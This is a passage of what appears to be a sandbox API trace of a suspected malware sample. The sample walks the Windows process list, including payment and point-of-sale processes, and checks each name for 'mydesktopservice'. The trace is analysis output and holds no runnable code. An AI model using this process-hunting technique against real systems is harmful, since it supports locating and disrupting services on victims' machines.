LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356c8a8 [0094.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356c8a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0094.276] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0094.276] StrStrIA (lpFirst="ccv_server.exe", lpSrch="mydesktopservice") returned 0x0 [0094.276] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0094.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0094.277] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3569b88 [0094.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3569b88, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0094.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0094.277] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="mydesktopservice") returned 0x0 [0094.277] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0094.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.279] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3569bc8 [0094.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3569bc8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0094.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0094.279] StrStrIA (lpFirst="creditservice.exe", lpSrch="mydesktopservice") returned 0x0 [0094.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0094.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.280] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c770 [0094.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356c770, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0094.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0094.280] StrStrIA (lpFirst="edcsvr.exe", lpSrch="mydesktopservice") returned 0x0 [0094.280] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0094.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.282] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356c938 [0094.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356c938, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0094.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0094.282] StrStrIA (lpFirst="fpos.exe", lpSrch="mydesktopservice") returned 0x0 [0094.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0094.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.283] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c8c0 [0094.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356c8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0094.283] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0094.283] StrStrIA (lpFirst="isspos.exe", lpSrch="mydesktopservice") returned 0x0 [0094.283] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0094.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.284] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569828 [0094.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3569828, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0094.285] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0094.285] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="mydesktopservice") returned 0x0 [0094.285] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0094.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.286] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c8f0 [0094.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356c8f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0094.286] StrStrIA (lpFirst="omnipos.exe", lpSrch="mydesktopservice") returned 0x0 [0094.286] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0094.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.287] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c968 [0094.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x356c968, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.287] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0094.287] StrStrIA (lpFirst="spcwin.exe", lpSrch="mydesktopservice") returned 0x0 [0094.287] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0094.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.288] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3569848 [0094.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3569848, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0094.289] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0094.289] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="mydesktopservice") returned 0x0 [0094.289] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0094.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.290] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356c908 [0094.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356c908, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0094.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0094.290] StrStrIA (lpFirst="utg2.exe", lpSrch="mydesktopservice") returned 0x0 [0094.290] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0094.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.291] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c980 [0094.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356c980, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0094.292] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0094.292] StrStrIA (lpFirst="saying.exe", lpSrch="mydesktopservice") returned 0x0 [0094.292] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.293] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356c818 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356c818, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0094.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0094.293] StrStrIA (lpFirst="ripe.exe", lpSrch="mydesktopservice") returned 0x0 [0094.293] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0094.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.294] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c788 [0094.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356c788, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0094.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0094.294] StrStrIA (lpFirst="acoustic.exe", lpSrch="mydesktopservice") returned 0x0 [0094.294] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0094.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.295] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356c7a0 [0094.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356c7a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0094.295] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0094.296] StrStrIA (lpFirst="mail.exe", lpSrch="mydesktopservice") returned 0x0 [0094.296] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.297] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c860 [0094.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356c860, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.297] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mydesktopservice") returned 0x0 [0094.297] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.298] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c878 [0094.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356c878, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.298] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.298] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.298] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.303] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c998 [0094.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356c998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0094.303] StrStrIA (lpFirst="dllhost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.303] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.305] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c890 [0094.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356c890, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.305] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.305] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mydesktopservice") returned 0x0 [0094.305] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0094.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.306] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c7b8 [0094.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356c7b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0094.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0094.306] StrStrIA (lpFirst="UsoClient.exe", lpSrch="mydesktopservice") returned 0x0 [0094.306] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.307] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c7e8 [0094.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356c7e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.308] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mydesktopservice") returned 0x0 [0094.308] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0094.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0094.309] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3569868 [0094.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3569868, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0094.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0094.309] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="mydesktopservice") returned 0x0 [0094.309] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0094.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.310] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35698a8 [0094.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x35698a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0094.310] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0094.310] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="mydesktopservice") returned 0x0 [0094.310] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0094.311] WideCharToMultiByte (in: CodePage=0x0, 